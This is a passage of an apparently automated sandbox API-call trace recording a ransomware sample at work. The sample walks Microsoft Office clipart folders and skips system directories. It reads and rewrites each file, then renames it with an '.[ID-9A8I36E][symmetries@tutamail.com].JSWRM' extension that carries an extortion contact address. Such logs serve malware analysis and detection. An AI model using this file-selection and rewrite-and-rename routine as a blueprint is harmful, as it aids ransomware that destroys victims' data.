(HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0087.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0087.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.703] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199423.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199423.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0087.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0087.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.704] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4124, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0199429.WMF", cAlternateFileName="")) returned 1 [0087.704] lstrcmpiW (lpString1="J0199429.WMF", lpString2=".") returned 1 [0087.704] lstrcmpiW (lpString1="J0199429.WMF", lpString2="..") returned 1 [0087.704] lstrcmpiW (lpString1="J0199429.WMF", lpString2="...") returned 1 [0087.704] lstrcmpiW (lpString1="J0199429.WMF", lpString2="windows") returned -1 [0087.704] lstrcmpiW (lpString1="J0199429.WMF", lpString2="recovery") returned -1 [0087.704] lstrcmpiW (lpString1="J0199429.WMF", lpString2="perflogs") returned -1 [0087.704] lstrcmpiW (lpString1="J0199429.WMF", lpString2="documents and settings") returned 1 [0087.704] lstrcmpiW (lpString1="J0199429.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.705] lstrcmpiW (lpString1="J0199429.WMF", lpString2="system volume information") returned -1 [0087.705] lstrcmpiW (lpString1="J0199429.WMF", lpString2="msocache") returned -1 [0087.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0087.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199429.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199429.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199429.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0087.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0087.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199429.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199429.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199429.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0087.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0087.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0087.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0087.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199429.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.705] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16676) returned 1 [0087.705] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4120) returned 0x24d210 [0087.705] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4120, lpOverlapped=0x0) returned 1 [0087.744] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.744] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4120, lpOverlapped=0x0) returned 1 [0087.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.744] CloseHandle (hObject=0x314) returned 1 [0087.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0087.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0087.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0087.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0087.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0087.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0087.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.745] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199429.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199429.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0087.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0087.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0087.746] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13c4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0199465.WMF", cAlternateFileName="")) returned 1 [0087.746] lstrcmpiW (lpString1="J0199465.WMF", lpString2=".") returned 1 [0087.746] lstrcmpiW (lpString1="J0199465.WMF", lpString2="..") returned 1 [0087.746] lstrcmpiW (lpString1="J0199465.WMF", lpString2="...") returned 1 [0087.746] lstrcmpiW (lpString1="J0199465.WMF", lpString2="windows") returned -1 [0087.746] lstrcmpiW (lpString1="J0199465.WMF", lpString2="recovery") returned -1 [0087.746] lstrcmpiW (lpString1="J0199465.WMF", lpString2="perflogs") returned -1 [0087.746] lstrcmpiW (lpString1="J0199465.WMF", lpString2="documents and settings") returned 1 [0087.746] lstrcmpiW (lpString1="J0199465.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.746] lstrcmpiW (lpString1="J0199465.WMF", lpString2="system volume information") returned -1 [0087.746] lstrcmpiW (lpString1="J0199465.WMF", lpString2="msocache") returned -1 [0087.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0087.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199465.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199465.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199465.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0087.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0087.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199465.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199465.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199465.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0087.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0087.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0087.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0087.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199465.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.747] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5060) returned 1 [0087.747] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13c0) returned 0x205850 [0087.748] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x13c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x13c0, lpOverlapped=0x0) returned 1 [0087.749] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.750] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x13c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x13c0, lpOverlapped=0x0) returned 1 [0087.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.750] CloseHandle (hObject=0x314) returned 1 [0087.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0087.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0087.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0087.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0087.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0087.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0087.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.750] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199465.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199465.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0087.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0087.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0087.751] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x35bc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0199469.WMF", cAlternateFileName="")) returned 1 [0087.751] lstrcmpiW (lpString1="J0199469.WMF", lpString2=".") returned 1 [0087.751] lstrcmpiW (lpString1="J0199469.WMF", lpString2="..") returned 1 [0087.751] lstrcmpiW (lpString1="J0199469.WMF", lpString2="...") returned 1 [0087.751] lstrcmpiW (lpString1="J0199469.WMF", lpString2="windows") returned -1 [0087.751] lstrcmpiW (lpString1="J0199469.WMF", lpString2="recovery") returned -1 [0087.751] lstrcmpiW (lpString1="J0199469.WMF", lpString2="perflogs") returned -1 [0087.751] lstrcmpiW (lpString1="J0199469.WMF", lpString2="documents and settings") returned 1 [0087.751] lstrcmpiW (lpString1="J0199469.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.751] lstrcmpiW (lpString1="J0199469.WMF", lpString2="system volume information") returned -1 [0087.751] lstrcmpiW (lpString1="J0199469.WMF", lpString2="msocache") returned -1 [0087.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0087.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199469.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199469.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199469.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0087.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0087.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199469.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0199469.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0199469.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0087.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0087.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0087.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0087.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199469.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.753] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13756) returned 1 [0087.753] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x35b0) returned 0x24d210 [0087.753] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x35b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x35b0, lpOverlapped=0x0) returned 1 [0087.755] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.755] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x35b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x35b0, lpOverlapped=0x0) returned 1 [0087.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.755] CloseHandle (hObject=0x314) returned 1 [0087.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0087.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0087.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0087.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0087.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0087.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0087.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.756] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199469.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199469.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0087.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0087.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0087.757] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a18, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0199473.WMF", cAlternateFileName="")) returned 1 [0087.757] lstrcmpiW (lpString1="J0199473.WMF", lpString2=".") returned 1 [0087.757] lstrcmpiW (lpString1="J0199473.WMF", lpString2="..") returned 1 [0087.757] lstrcmpiW (lpString1="J0199473.WMF", lpString2="...") returned 1 [0087.757] lstrcmpiW (lpString1="J0199473.WMF", lpString2="windows") returned -1 [0087.757] lstrcmpiW (lpString1="J0199473.WMF", lpString2="recovery") returned -1 [0087.757] lstrcmpiW (lpString1="J0199473.WMF", lpString2="perflogs") returned -1 [0087.757] lstrcmpiW (lpString1="J0199473.WMF", lpString2="documents and settings") returned 1 [0087.757] lstrcmpiW (lpString1="J0199473.WMF", 